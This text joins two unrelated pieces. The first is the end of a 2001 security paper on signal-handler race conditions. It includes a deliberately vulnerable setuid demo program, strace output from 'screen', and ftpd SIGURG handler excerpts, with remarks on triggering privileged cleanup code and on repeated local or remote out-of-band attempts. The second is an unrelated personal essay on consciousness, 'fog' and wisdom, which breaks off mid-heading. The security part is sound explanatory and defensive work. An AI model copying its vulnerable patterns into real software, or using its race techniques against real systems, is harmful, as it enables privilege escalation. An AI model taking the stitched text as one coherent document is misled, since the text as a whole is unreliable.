Some programs are temporarily returning to superuser UID in cleanup
routines, e.g., in order to unlink specific files. Very often, by entering
the handler at given moment, is possible to perform all the cleanup file
access operations with superuser privileges.
Here's an example of such coding, that can be found mainly in
interactive setuid software:
--- vuln2.c ---
#include <signal.h>
#include <string.h>
#include <stdlib.h>
void sh(int dummy) {
printf("Running with uid=%d euid=%d\n",getuid(),geteuid());
}
int main(int argc,char* argv[]) {
seteuid(getuid());
setreuid(0,getuid());
signal(SIGTERM,sh);
sleep(5);
// this is a temporarily privileged code:
seteuid(0);
unlink("tmpfile");
sleep(5);
seteuid(getuid());
exit(0);
}
---- EOF ----
$ ./vuln & sleep 3; killall -TERM vuln; sleep 3; killall -TERM vuln
Running with uid=500 euid=500
Running with uid=500 euid=0
Such a coding practice can be found, par example, in 'screen' utility
developed by Oliver Laumann. One of the most obvious locations is CoreDump
handler [screen.c]:
static sigret_t
CoreDump SIGDEFARG
{
/.../
setgid(getgid());
setuid(getuid());
unlink("core");
/.../
SIGSEGV can be delivered in the middle of user-initiated screen detach
routine, for example. To better understand what and why is going on,
here's an strace output for detach (Ctrl+A, D) command:
23534 geteuid() = 0
23534 geteuid() = 0
23534 getuid() = 500
23534 setreuid(0, 500) = 0 HERE IT HAPPENS
23534 getegid() = 500
23534 chmod("/home/lcamtuf/.screen/23534.tty5.nimue", 0600) = 0
23534 utime("/home/lcamtuf/.screen/23534.tty5.nimue", NULL) = 0
23534 geteuid() = 500
23534 getuid() = 0
Marked line sets uid to zero. If SIGSEGV is delivered somewhere near this
point, CoreDump() handler would run with superuser privileges, due to
initial setuid(getuid()).
This is a very interesting issue, directly related to re-entering libc
functions and/or interrupting non-atomic code. Many complex daemons,
like ftp, some http/proxy services, MTAs, etc., have SIGURG handlers declared -
very often these handlers are pretty verbose, calling syslog(), or freeing
some resources allocated for specific connection. The trick is that SIGURG,
obviously, can be delivered over the network, using TCP/IP OOB message.
Thus, it is possible to perform attacks using network layer without
any priviledges.
Below is a SIGURG handler routine, which, with small modifications,
is shared both by BSD ftpd and WU-FTPD daemons:
static VOIDRET myoob FUNCTION((input), int input)
{
/.../
if (getline(cp, 7, stdin) == NULL) {
reply(221, "You could at least say goodbye.");
dologout(0);
}
/.../
}
As you can see in certain conditions, dologout() function is called.
This routine looks this way:
dologout(int status)
{
/.../
if (logged_in) {
delay_signaling(); / we can't allow any signals while euid==0: kinch /
(void) seteuid((uid_t) 0);
wu_logwtmp(ttyline, "", "");
}
if (logging)
syslog(LOG_INFO, "FTP session closed");
/.../
}
As you can see, the authors took an additional precaution not to allow
signal delivery in the "logged_in" case. Unfortunately, syslog() is
a perfect example of a libc function that should NOT be called during
signal handling, regardless of whether "logged_in" or any other
special condition happens to be in effect.
As mentioned before, heap management functions such as malloc() are
called within syslog(), and these functions are not atomic. The OOB
message might arrive when the heap is in virtually any possible state.
Playing with uids / privileges / internal state is an option, as well.
In most cases this is a non-issue for local attacks, as the attacker
might control the execution environment (e.g., the load average, the
number of local files that the daemon needs to access, etc.) and try
a virtually infinite number of times by invoking the same program over
and over again, increasing the possibility of delivering signal at
given point. For remote attacks, this is a major issue, but as long
as the attack itself won't cause service to stop responding, thousands of
attempts might be performed.
This is a very complex and difficult task. There are at least three aspects
of this:
Using reentrant-safe libcalls in signal handlers only. This would
require major rewrites of numerous programs. Another half-solution is
to implement a wrapper around every insecure libcall used, having
special global flag checked to avoid re-entry,
Blocking signal delivery during all non-atomic operations and/or
constructing signal handlers in the way that would not rely on
internal program state (e.g. unconditional setting of specific flag
and nothing else),
Blocking signal delivery in signal handlers.
Michal Zalewski
<lcamtuf@razor.bindview.com>
16-17 May, 2001
The mind…can make a heaven of hell, a hell of heaven. ― John Milton
The mind is certainly its own cosmos. — Alan Lightman
You go to school, study hard, get a degree, and you’re pleased with yourself. But are you wiser?
You get a job, achieve things at the job, gain responsibility, get paid more, move to a better company, gain even more responsibility, get paid even more, rent an apartment with a parking spot, stop doing your own laundry, and you buy one of those $9 juices where the stuff settles down to the bottom. But are you happier?
You do all kinds of life things—you buy groceries, read articles, get haircuts, chew things, take out the trash, buy a car, brush your teeth, shit, sneeze, shave, stretch, get drunk, put salt on things, have sex with someone, charge your laptop, jog, empty the dishwasher, walk the dog, buy a couch, close the curtains, button your shirt, wash your hands, zip your bag, set your alarm, fix your hair, order lunch, act friendly to someone, watch a movie, drink apple juice, and put a new paper towel roll on the thing.
But as you do these things day after day and year after year, are you improving as a human in a meaningful way?
In the last post, I described the way my own path had led me to be an atheist—but how in my satisfaction with being proudly nonreligious, I never gave serious thought to an active approach to internal improvement—hindering my own evolution in the process.
This wasn’t just my own naiveté at work. Society at large focuses on shallow things, so it doesn’t stress the need to take real growth seriously. The major institutions in the spiritual arena—religions—tend to focus on divinity over people, making salvation the end goal instead of self-improvement. The industries that do often focus on the human condition—philosophy, psychology, art, literature, self-help, etc.—lie more on the periphery, with their work often fragmented from each other. All of this sets up a world that makes it hard to treat internal growth as anything other than a hobby, an extra-curricular, icing on the life cake.
Considering that the human mind is an ocean of complexity that creates every part of our reality, working on what’s going on in there seems like it should be a more serious priority. In the same way a growing business relies on a clear mission with a well thought-out strategy and measurable metrics, a growing human needs a plan—if we want to meaningfully improve, we need to define a goal, understand how to get there, become aware of obstacles in the way, and have a strategy to get past them.
When I dove into this topic, I thought about my own situation and whether I was improving. The efforts were there—apparent in many of this blog’s post topics—but I had no growth model, no real plan, no clear mission. Just kind of haphazard attempts at self-improvement in one area or another, whenever I happened to feel like it. So I’ve attempted to consolidate my scattered efforts, philosophies, and strategies into a single framework—something solid I can hold onto in the future—and I’m gonna use this post to do a deep dive into it.
So settle in, grab some coffee, and get your brain out and onto the table in front of you—you’ll want to have it there to reference as we explore what a weird, complicated object it is.
The Goal
Wisdom. More on that later.
How Do We Get to the Goal?
By being aware of the truth. When I say “the truth,” I’m not being one of those annoying people who says the word truth to mean some amorphous, mystical thing—I’m just referring to the actual facts of reality. The truth is a combination of what we know and what we don’t know—and gaining and maintaining awareness of both sides of this reality is the key to being wise.
Easy, right? We don’t have to know more than we know, we only have to be aware of what we know and what we don’t know. Truth is in plain sight, written on the whiteboard—we just have to look at the board and reflect upon it. There’s just this one thing—
What’s in Our Way?
The fog.
To understand the fog, let’s first be clear that we’re not here:
Evolution
We’re here:
Evolution Plus
And this isn’t the situation:
consciousness binary
This is:
consciousness spectrum
This is a really hard concept for humans to absorb, but it’s the starting place for growth. Declaring ourselves “conscious” allows us to call it a day and stop thinking about it. I like to think of it as a consciousness staircase:
big staircase
An ant is more conscious than a bacterium, a chicken more than an ant, a monkey more than a chicken, and a human more than a monkey. But what’s above us?
A) Definitely something, and B) Nothing we can understand better than a monkey can understand our world and how we think.
There’s no reason to think the staircase doesn’t extend upwards forever. The red alien a few steps above us on the staircase would see human consciousness the same way we see that of an orangutan—they might think we’re pretty impressive for an animal, but that of course we don’t actually begin to understand anything. Our most brilliant scientist would be outmatched by one of their toddlers.
To the green alien up there higher on the staircase, the red alien might seem as intelligent and conscious as a chicken seems to us. And when the green alien looks at us, it sees the simplest little pre-programmed ants.
We can’t conceive of what life higher on the staircase would be like, but absorbing the fact that higher stairs exist and trying to view ourselves from the perspective of one of those steps is the key mindset we need to be in for this exercise.
For now, let’s ignore those much higher steps and just focus on the step right above us—that light green step. A species on that step might think of us like we think of a three-year-old child—emerging into consciousness through a blur of simplicity and naiveté. Let’s imagine that a representative from that species was sent to observe humans and report back to his home planet about them—what would he think of the way we thought and behaved? What about us would impress him? What would make him cringe?
I think he’d very quickly see a conflict going on in the human mind. On one hand, all of those steps on the staircase below the human are where we grew from. Hundreds of millions of years of evolutionary adaptations geared toward animal survival in a rough world are very much rooted in our DNA, and the primitive impulses in us have birthed a bunch of low-grade qualities—fear, pettiness, jealousy, greed, instant-gratification, etc. Those qualities are the remnants of our animal past and still a prominent part of our brains, creating a zoo of small-minded emotions and motivations in our heads:
normal animal brain
But over the past six million years, our evolutionary line has experienced a rapid growth in consciousness and the incredible ability to reason in a way no other species on Earth can. We’ve taken a big step up the consciousness staircase, very quickly—let’s call this burgeoning element of higher consciousness our Higher Being.
Higher Being
The Higher Being is brilliant, big-thinking, and totally rational. But on the grand timescale, he’s a very new resident in our heads, while the primal animal forces are ancient, and their coexistence in the human mind makes it a strange place:
animal + higher being
So it’s not that a human is the Higher Being and the Higher Being is three years old—it’s that a human is the combination of the Higher Being and the low-level animals, and they blend into the three-year-old that we are. The Higher Being alone would be a more advanced species, and the animals alone would be one far more primitive, and it’s their particular coexistence that makes us distinctly human.
As humans evolved and the Higher Being began to wake up, he looked around your brain and found himself in an odd and unfamiliar jungle full of powerful primitive creatures that didn’t understand who or what he was. His mission was to give you clarity and high-level thought, but with animals tramping around his work environment, it wasn’t an easy job. And things were about to get much worse. Human evolution continued to make the Higher Being more and more sentient, until one day, he realized something shocking:
WE’RE GOING TO DIE
It marked the first time any species on planet Earth was conscious enough to understand that fact, and it threw all of those animals in the brain—who were not built to handle that kind of information—into a complete frenzy, sending the whole ecosystem into chaos:
chaotic brain
The animals had never experienced this kind of fear before, and their freakout about this—one that continues today—was the last thing the Higher Being needed as he was trying to grow and learn and make decisions for us.
The adrenaline-charged animals romping around our brain can take over our mind, clouding our thoughts, judgment, sense of self, and understanding of the world. The collective force of the animals is what I call “the fog.” The more the animals are running the show and making us deaf and blind to the thoughts and insights of the Higher Being, the thicker the fog is around our head, often so thick we can only see a few inches in front of our face:
fog head
Let’s think back to our goal above and our path to it—being aware of the truth. The Higher Being can see the truth just fine in almost any situation. But when the fog is thick around us, blocking our eyes and ears and coating our brain, we have no access to the Higher Being or his insight. This is why being continually aware of the truth is so hard—we’re too lost in the fog to see it or think about it.
And when the alien representative is finished observing us and heads back to his home planet, I think this would be his sum-up of our problems:
The battle of the Higher Being against the animals—of trying to see through the fog to clarity—is the core internal human struggle.
This struggle in our heads takes place on many fronts. We’ve examined a few of them here: the Higher Being (in his role as the Rational Decision Maker) fighting the Instant Gratification Monkey; the Higher Being (in the role of the Authentic Voice) battling against the overwhelmingly scared Social Survival Mammoth; the Higher Being’s message that life is just a bunch of Todays getting lost in the blinding light of fog-based yearning for better tomorrows. Those are all part of the same core conflict between our primal past and our enlightened future.
The shittiest thing about the fog is that when you’re in the fog, it blocks your vision so you can’t see that you’re in the fog. It’s when the fog is thickest that you’re the least aware that it’s there at all—it makes you unconscious. Being aware that the fog exists and learning how to recognize it is the key first step to rising up in consciousness and becoming a wiser person.
So we’ve established that our goal is wisdom, that to get there we need to become as aware as possible of the truth, and that the main thing standing in our way is the fog. Let’s zoom in on the battlefield to look at why “being aware of the truth” is so important and how we can overcome the fog to get there:
The Battlefield
No matter how hard we tried, it would be impossible for humans to access that light green step one above us on the consciousness staircase. Our advanced capability—the Higher Being—just isn’t there yet. Maybe in a million years or two. For now, the only place this battle can happen is on the one step where we live, so that’s where we’re going to zoom in. We need to focus on the mini spectrum of consciousness within our step, which we can do by breaking our step down into four substeps:
substeps
Climbing this mini consciousness staircase is the road to truth, the way to wisdom, my personal mission for growth, and a bunch of other cliché statements I never thought I’d hear myself say. We just have to understand the game and work hard to get good at it.
Let’s look at each step to try to understand the challenges we’re dealing with and how we can make progress:
Step 1: Our Lives in the Fog
Step 1 is the lowest step, the foggiest step, and unfortunately, for most of us it’s our default level of existence. On Step 1, the fog is all up in our shit, thick and close and clogging our senses, leaving us going through life unconscious. Down here, the thoughts, values, and priorities of the Higher Being are completely lost in the blinding fog and the deafening roaring, tweeting, honking, howling, and squawking of the animals in our heads. This makes us 1) small-minded, 2) short-sighted, and 3) stupid. Let’s discuss each of these:
1) On Step 1, you’re terribly small-minded because the animals are running the show.
When I look at the wide range of motivating emotions that humans experience, I don’t see them as a scattered range, but rather falling into two distinct bins: the high-minded, love-based, advanced emotions of the Higher Being, and the small-minded, fear-based, primitive emotions of our brain animals.
And on Step 1, we’re completely intoxicated by the animal emotions as they roar at us through the dense fog.
animals in fog
This is what makes us petty and jealous and what makes us so thoroughly enjoy the misfortune of others. It’s what makes us scared, anxious, and insecure. It’s why we’re self-absorbed and narcissistic; vain and greedy; narrow-minded and judgmental; cold, callous, and even cruel. And only on Step 1 do we feel that primitive “us versus them” tribalism that makes us hate people different than us.
You can find most of these same emotions in a clan of capuchin monkeys—and that makes sense, because at their core, these emotions can be boiled down to the two keys of animal survival: self-preservation and the need to reproduce.
Step 1 emotions are brutish and powerful and grab you by the collar, and when they’re upon you, the Higher Being and his high-minded, love-based emotions are shoved into the sewer.
2) On Step 1, you’re short-sighted, because the fog is six inches in front of your face, preventing you from seeing the big picture.
The fog explains all kinds of totally illogical and embarrassingly short-sighted human behavior.
Why else would anyone ever take a grandparent or parent for granted while they’re around, seeing them only occasionally, opening up to them only rarely, and asking them barely any questions—even though after they die, you can only think about how amazing they were and how you can’t believe you didn’t relish the opportunity to enjoy your relationship with them and get to know them better when they were around?
Why else would people brag so much, even though if they could see the big picture, it would be obvious that everyone finds out about the good things in your life eventually either way—and that you always serve yourself way more by being modest?
Why else would someone do the bare minimum at work, cut corners on work projects, and be dishonest about their efforts—when anyone looking at the big picture would know that in a work environment, the truth about someone’s work habits eventually becomes completely apparent to both bosses and colleagues, and you’re never really fooling anyone? Why would someone insist on making sure everyone knows when they did something valuable for the company—when it should be obvious that acting that way is transparent and makes it seem like you’re working hard just for the credit, while just doing things well and having one of those things happen to be noticed does much more for your long term reputation and level of respect at the company?
If not for thick fog, why would anyone ever pinch pennies over a restaurant bill or keep an unpleasantly-rigid scorecard of who paid for what on a trip, when everyone reading this could right now give each of their friends a quick and accurate 1-10 rating on the cheap-to-generous (or selfish-to-considerate) scale, and the few hundred bucks you save over time by being on the cheap end of the scale is hardly worth it considering how much more likable and respectable it is to be generous?
What other explanation is there for the utterly inexplicable decision by so many famous men in positions of power to bring down the career and marriage they spent their lives building by having an affair?
And why would anyone bend and loosen their integrity for tiny insignificant gains when integrity affects your long-term self-esteem and tiny insignificant gains affect nothing in the long term?
How else could you explain the decision by so many people to let the fear of what others might think dictate the way they live, when if they could see clearly they’d realize that A) that’s a terrible reason to do or not do something, and B) no one’s really thinking about you anyway—they’re buried in their own lives.
And then there are all the times when someone’s opaque blinders keep them in the wrong relationship, job, city, apartment, friendship, etc. for years, sometimes decades, only for them to finally make a change and say “I can’t believe I didn’t do this earlier,” or “I can’t believe I couldn’t see how wrong that was for me.” They should absolutely believe it, because that’s the power of the fog.
3) On Step 1, you’re very, very stupid.
One way this stupidity shows up is in us making the same obvious mistakes over and over and over again.1
The most glaring example is the way the fog convinces us, time after time after time, that certain things will make us happy that in reality absolutely don’t. The fog lines up a row of carrots, tells us that they’re the key to happiness, and tells us to forget today’s happiness in favor of directing all of our hope to all the happiness the future will hold because we’re gonna get those carrots.
And even though the fog has proven again and again that it has no idea how human happiness works—even though we’ve had so many experiences finally getting a carrot and feeling a ton of temporary happiness, only to watch that happiness fade right back down to our default level a few days later—we continue to fall for the trick.
It’s like hiring a nutritionist to help you with your exhaustion, and they tell you that the key is to drink an espresso shot anytime you’re tired. So you’d try it and think the nutritionist was a genius until an hour later when it dropped you like an anvil back into exhaustion. You go back to the nutritionist, who gives you the same advice, so you try it again and the same thing happens. That would probably be it right? You’d fire the nutritionist. Right? So why are we so gullible when it comes to the fog’s advice on happiness and fulfillment?
The fog is also much more harmful than the nutritionist because not only does it give us terrible advice—but the fog itself is the source of unhappiness. The only real solution to exhaustion is to sleep, and the only real way to improve happiness in a lasting way is to make progress in the battle against the fog.
There’s a concept in psychology called The Hedonic Treadmill, which suggests that humans have a stagnant default happiness level and when something good or bad happens, after an initial change in happiness, we always return to that default level. And on Step 1, this is completely true of course, given that trying to become permanently happier while in the fog is like trying to dry your body off while standing under the shower with the water running.
But I refuse to believe the same species that builds skyscrapers, writes symphonies, flies to the moon, and understands what a Higgs boson is is incapable of getting off the treadmill and actually improving in a meaningful way.
I think the way to do it is by learning to climb this consciousness staircase to spend more of our time on Steps 2, 3, and 4, and less of it mired unconsciously in the fog.
Step 2: Thinning the Fog to Reveal Context
Humans can do something amazing that no other creature on Earth can do—they can imagine. If you show an animal a tree, they see a tree. Only a human can imagine the acorn that sunk into the ground 40 years earlier, the small flimsy stalk it was at three years old, how stark the tree must look when it’s winter, and the eventual dead tree lying horizontally in that same place.
This is the magic of the Higher Being in our heads.
On the other hand, the animals in your head, like their real world relatives, can only see a tree, and when they see one, they react instantly to it based on their primitive needs. When you’re on Step 1, your unconscious animal-run state doesn’t even remember that the Higher Being exists, and his genius abilities go to waste.
Step 2 is all about thinning out the fog enough to bring the Higher Being’s thoughts and abilities into your consciousness, allowing you to see behind and around the things that happen in life. Step 2 is about bringing context into your awareness, which reveals a far deeper and more nuanced version of the truth.
There are plenty of activities or undertakings that can help thin out your fog. To name three:
1) Learning more about the world through education, travel, and life experience—as your perspective broadens, you can see a clearer and more accurate version of the truth.
2) Active reflection. This is what a journal can help with, or therapy, which is basically examining your own brain with the help of a fog expert. Sometimes a hypothetical question can be used as “fog goggles,” allowing you to see something clearly through the fog—questions like, “What would I do if money were no object?” or “How would I advise someone else on this?” or “Will I regret not having done this when I’m 80?” These questions are a way to ask your Higher Being’s opinion on something without the animals realizing what’s going on, so they’ll stay calm and the Higher Being can actually talk—like when parents spell out a word in front of their four-year-old when they don’t want him to know what they’re saying.2
3) Meditation, exercise, yoga, etc.—activities that help quiet the brain’s unconscious chatter, i.e. allowing the fog to settle.
But the easiest and most effective way to thin out the fog is simply to be aware of it. By knowing that fog exists, understanding what it is and the different forms it takes, and learning to recognize when you’re in it, you hinder its ability to run your life. You can’t get to Step 2 if you don’t know when you’re on Step 1.
The way to move onto Step 2 is by remembering to stay aware of the context behind and around what you see, what you come across, and the decisions you make. That’s it—remaining cognizant of the fog and remembering to look at the whole context keeps you conscious, aware of reality, and as you’ll see, makes you a much better version of yourself than you are on Step 1. Some examples—
Here’s what a rude cashier looks like on Step 1 vs. Step 2:
cashier
Here’s what gratitude looks like:
gratitude
Something good happening:
good thing
Something bad happening:
bad thing
That phenomenon where everything suddenly seems horrible late at night in bed:
late night
A flat tire:
flat tire
Long-term consequences:
consequences
Looking at context makes us aware how much we actually know about most situations (as well as what we don’t know, like what the cashier’s day was like so far), and it reminds us of the complexity and nuance of people, life, and situations. When we’re on Step 2, this broader scope and increased clarity makes us feel calmer and less fearful of things that aren’t actually scary, and the animals—who gain their strength from fear and thrive off of unconsciousness—suddenly just look kind of ridiculous:
animals clump
When the small-minded animal emotions are less in our face, the more advanced emotions of the Higher Being—love, compassion, humility, empathy, etc.—begin to light up.
The good news is there’s no learning required to be on Step 2—your Higher Being already knows the context around all of these life situations. It doesn’t take hard work, and no additional information or expertise is needed—you only have to consciously think about being on Step 2 instead of Step 1 and you’re there. You’re probably there right now just by reading this.
The bad news is that it’s extremely hard to stay on Step 2 for long. The Catch-22 here is that it’s not easy to stay conscious of the fog because the fog makes you unconscious.
That’s the first challenge at hand. You can’t get rid of the fog, and you can’t always keep it thin, but you can get better at noticing when it’s thick and develop effective strategies for thinning it out whenever you consciously focus on it. If you’re evolving successfully, as you get older, you should be spending more and more time on Step 2 and less and less on Step 1.
Step 3: Shocking Reality
I . . . a universe of atoms . . . an atom in the universe. —Richard Feynman
Step 3 is when things start to get weird. Even on the more enlightened Step 2, we kind of think we’re here:
happy earth land
As delightful as that is, it’s a complete delusion. We live our days as if we’re just here on this green and brown land with our blue sky and our chipmunks and our caterpillars. But this is actually what’s happening:
Little Earth
But even more actually, this is happening:
IDL TIFF file
We also tend to kind of think this is the situation:
life timeline
When really, it’s this:
long timeline
You might even think you’re a thing. Do you?
Thing
No you’re a ton of these:
atom
This is the next iteration of truth on our little staircase, and our brains can’t really handle it. Asking a human to internalize the vastness of space or the eternity of time or the tininess of atoms is like asking a dog to stand up on its hind legs—you can do it if you focus, but it’s a strain and you can’t hold it for very long.3
You can think about the facts anytime—The Big Bang was 13.8 billion years ago, which is about 130,000 times longer than humans have existed; if the sun were a ping pong ball in New York, the closest star to us would be a ping pong ball in Atlanta; the Milky Way is so big that if you made a scale model of it that was the size of the US, you would still need a microscope to see the sun; atoms are so small that there are about as many atoms in one grain of salt as there are grains of sand on all the beaches on Earth. But once in a while, when you deeply reflect on one of these facts, or when you’re in the right late night conversation with the right person, or when you’re staring at the stars, or when you think too hard about what death actually means—you have a Whoa moment.
A true Whoa moment is hard to come by and even harder to maintain for very long, like our dog’s standing difficulties. Thinking about this level of reality is like looking at an amazing photo of the Grand Canyon; a Whoa moment is like being at the Grand Canyon—the two experiences are similar but somehow vastly different. Facts can be fascinating, but only in a Whoa moment does your brain actually wrap itself around true reality. In a Whoa moment, your brain for a second transcends what it’s been built to do and offers you a brief glimpse into the astonishing truth of our existence. And a Whoa moment is how you get to Step 3.
I love Whoa moments. They make me feel some intense combination of awe, elation, sadness, and wonder. More than anything, they make me feel ridiculously, profoundly humble—and that level of humility does weird things to a person. In those moments, all those words religious people use—awe, worship, miracle, eternal connection—make perfect sense. I want to get on my knees and surrender. This is when I feel spiritual.
And in those fleeting moments, there is no fog—my Higher Being is in full flow and can see everything in perfect clarity. The normally-complicated world of morality is suddenly crystal clear, because the only fathomable emotions on Step 3 are the most high-level. Any form of pettiness or hatred is a laughable concept up on Step 3—with no fog to obscure things, the animals are completely naked, exposed for the sad little creatures that they are.
animals embarrassed
On Step 1, I snap back at the rude cashier, who had the nerve to be a dick to me. On Step 2, the rudeness doesn’t faze me because I know it’s about him, not me, and that I have no idea what his day or life has been like. On Step 3, I see myself as a miraculous arrangement of atoms in vast space that for a split second in endless eternity has come together to form a moment of consciousness that is my life…and I see that cashier as another moment of consciousness that happens to exist on the same speck of time and space that I do. And the only possible emotion I could have for him on Step 3 is love.
cashier 2
In a Whoa moment’s transcendent level of consciousness, I see every interaction, every motivation, every news headline in unusual clarity—and difficult life decisions are much more obvious. I feel wise.
Of course, if this were my normal state, I’d be teaching monks somewhere on a mountain in Myanmar, and I’m not teaching any monks anywhere because it’s not my normal state. Whoa moments are rare and very soon after one, I’m back down here being a human again. But the emotions and the clarity of Step 3 are so powerful, that even after you topple off the step, some of it sticks around. Each time you humiliate the animals, a little bit of their future power over you is diminished. And that’s why Step 3 is so important—even though no one that I know can live permanently on Step 3, regular visits help you dramatically in the ongoing Step 1 vs Step 2 battle, which makes you a better and happier person.
Step 3 is also the answer to anyone who accuses atheists of being amoral or cynical or nihilistic, or wonders how atheists find any meaning in life without the hope and incentive of an afterlife. That’s a Step 1 way to view an atheist, where life on Earth is taken for granted and it’s assumed that any positive impulse or emotion must be due to circumstances outside of life. On Step 3, I feel immensely lucky to be alive and can’t believe how cool it is that I’m a group of atoms that can think about atoms—on Step 3, life itself is more than enough to make me excited, hopeful, loving, and kind. But Step 3 is only possible because science has cleared the way there, which is why Carl Sagan said that “science is not only compatible with spirituality; it is a profound source of spirituality.” In this way, science is the “prophet” of this framework—the one who reveals new truth to us and gives us an opportunity to alter ourselves by accessing it.
So to recap so far—on Step 1, you’re in a delusional bubble that Step 2 pops. On Step 2, there’s much more clarity about life, but it’s within a much bigger delusional bubble, one that Step 3 pops. But Step 3 is supposed to be total, fog-free clarity on truth—so how could there be another step?
Step 4: The Great Unknown
If we ever reach the point where we think we thoroughly understand who we are and where we came from, we will have failed. —Carl Sagan
The game so far has for the most part been clearing out fog to become as conscious as possible of what we as people and as a species know about truth:
Step 1-3 Circles
On Step 4, we’re reminded of the complete truth—which is this:
Step 4 Circle
The fact is, any discussion of our full reality—of the truth of the universe or our existence—is a complete delusion without acknowledging that big purple blob that makes up almost all of that reality.
But you know humans—they don’t like that purple blob one bit. Never have. The blob frightens and humiliates humans, and we have a rich history of denying its existence entirely, which is like living on the beach and pretending the ocean isn’t there. Instead, we just stamp our foot and claim that now we’ve finally figured it all out. On the religious side, we invent myths and proclaim them as truth—and even a devout religious believer reading this who stands by the truth of their particular book would agree with me about the fabrication of the other few thousand books out there. On the science front, we’ve managed to be consistently gullible in believing that “realizing you’ve been horribly wrong about reality” is a phenomenon only of the past.
Having our understanding of reality overturned by a new groundbreaking discovery is like a shocking twist in this epic mystery novel humanity is reading, and scientific progress is regularly dotted with these twists—the Earth being round, the solar system being heliocentric, not geocentric, the discovery of subatomic particles or galaxies other than our own, and evolutionary theory, to name a few. So how is it possible, with the knowledge of all those breakthroughs, that Lord Kelvin, one of history’s greatest scientists, said in the year 1900, “There is nothing new to be discovered in physics now. All that remains is more and more precise measurement”4—i.e. this time, all the twists actually are finished.
Of course, Kelvin was as wrong as every other arrogant scientist in history—the theory of general relativity and then the theory of quantum mechanics would both topple science on its face over the next century.
Even if we acknowledge today that there will be more twists in the future, we’re probably kind of inclined to think we’ve figured out most of the major things and have a far closer-to-complete picture of reality than the people who thought the Earth was flat. Which, to me, sounds like this:
Laughing
The fact is, let’s remember that we don’t know what the universe is. Is it everything? Is it one tiny bubble in a multiverse frothing with bubbles? Is it not a bubble at all but an optical illusion hologram? And we know about the Big Bang, but was that the beginning of everything? Did something arise from nothing, or was it just the latest in a long series of expansion/collapse cycles?5 We have no clue what dark matter is, only that there’s a shit-ton of it in the universe, and when we discussed The Fermi Paradox, it became entirely clear that science has no idea about whether there’s other life out there or how advanced it might be. How about String Theory, which claims to be the secret to unifying the two grand but seemingly-unrelated theories of the physical world, general relativity and quantum mechanics? It’s either the grandest theory we’ve ever come up with or totally false, and there are great scientists on both sides of this debate. And as laypeople, all we need to do is take a look at those two well-accepted theories to realize how vastly different reality can be from how it seems: like general relativity telling us that if you flew to a black hole and circled around it a few times in intense gravity and then returned to Earth a few hours after you left, decades would have passed on Earth while you were gone. And that’s like an ice cream cone compared to the insane shit quantum mechanics tells us—like two particles across the universe from one another being mysteriously linked to each other’s behavior, or a cat that’s both alive and dead at the same time, until you look at it.
And the thing is, everything I just mentioned is still within the realm of our understanding. As we established earlier, compared to a more evolved level of consciousness, we might be like a three-year-old, a monkey, or an ant—so why would we assume that we’re even capable of understanding everything in that purple blob? A monkey can’t understand that the Earth is a round planet, let alone that the solar system, galaxy, or universe exists. You could try to explain it to a monkey for years and it wouldn’t be possible. So what are we completely incapable of grasping even if a more intelligent species tried its hardest to explain it to us? Probably almost everything.
There are really two options when thinking about the big, big picture: be humble or be absurd.
The nonsensical thing about humans feigning certainty because we’re scared is that in the old days, when it seemed on the surface that we were the center of all creation, uncertainty was frightening because it made our reality seem so much bleaker than we had thought—but now, with so much more uncovered, things look highly bleak for us as people and as a species, so our fear should welcome uncertainty. Given my default outlook that I have a small handful of decades left and then an eternity of nonexistence, the fact that we might be totally wrong sounds tremendously hopeful to me.
Ironically, when my thinking reaches the top of this rooted-in-atheism staircase, the notion that something that seems divine to us might exist doesn’t seem so ridiculous anymore. I’m still totally atheist when it comes to all human-created conceptions of a divine higher force—which all, in my opinion, proclaim far too much certainty. But could a super-advanced force exist? It seems more than likely. Could we have been created by something/someone bigger than us or be living as part of a simulation without realizing it? Sure—I’m a three-year-old, remember, so who am I to say no?
To me, complete rational logic tells me to be atheist about all of the Earth’s religions and utterly agnostic about the nature of our existence or the possible existence of a higher being. I don’t arrive there via any form of faith, just by logic.
I find Step 4 mentally mind-blowing but I’m not sure I’m ever quite able to access it in a spiritual way like I sometimes can with Step 3—Step 4 Whoa moments might be reserved for Einstein-level thinkers—but even if I can’t get my feet up on Step 4, I can know it’s there, what it means, and I can remind myself of its existence. So what does that do for me as a human?
Well remember that powerful humility I mentioned in Step 3? It multiples that by 100. For reasons I just discussed, it makes me feel more hopeful. And it leaves me feeling pleasantly resigned to the fact that I will never understand what’s going on, which makes me feel like I can take my hand off the wheel, sit back, relax, and just enjoy the ride. In this way, I think Step 4 can make us live more in the present—if I’m just a molecule floating around an ocean I can’t understand, I might as well just enjoy it.
The way Step 4 can serve humanity is by helping to crush the notion of certainty. Certainty is primitive, leads to “us versus them” tribalism, and starts wars. We should be united in our uncertainty, not divided over fabricated certainty. And the more humans turn around and look at that big purple blob, the better off we’ll be.
Why Wisdom is the Goal
Nothing clears fog like a deathbed, which is why it’s then that people can always see with more clarity what they should have done differently—I wish I had spent less time working; I wish I had communicated with my wife more; I wish I had traveled more; etc. The goal of personal growth should be to gain that deathbed clarity while your life is still happening so you can actually do something about it.
The way you do that is by developing as much wisdom as possible, as early as possible. To me, wisdom is the most important thing to work towards as a human. It’s the big objective—the umbrella goal under which all other goals fall into place. I believe I have one and only one chance to live, and I want to do it in the most fulfilled and meaningful way possible—that’s the best outcome for me, and I do a lot more good for the world that way. Wisdom gives people the insight to know what “fulfilled and meaningful” actually means and the courage to make the choices that will get them there.
And while life experience can contribute to wisdom, I think wisdom is mostly already in all of our heads—it’s everything the Higher Being knows. When we’re not wise, it’s because we don’t have access to the Higher Being’s wisdom because it’s buried in fog. The fog is anti-wisdom, and when you move up the staircase into a clearer place, wisdom is simply a by-product of that increased consciousness.
One thing I learned at some point is that growing old or growing tall is not the same as growing up. Being a grownup is about your level of wisdom and the size of your mind’s scope—and it turns out that it doesn’t especially correlate with age. After a certain age, growing up is about overcoming your fog, and that’s about the person, not the age. I know some supremely wise older people, but there are also a lot of people my age who seem much wiser than their parents about a lot of things. Someone on a growth path whose fog thins as they age will become wiser with age, but I find the reverse happens with people who don’t actively grow—the fog hardens around them and they actually become even less conscious, and even more certain about everything, with age.
When I think about people I know, I realize that my level of respect and admiration for a person is almost entirely in line with how wise and conscious a person I think they are. The people I hold in the highest regard are the grownups in my life—and their ages completely vary.
Another Look at Religion in Light of this Framework:
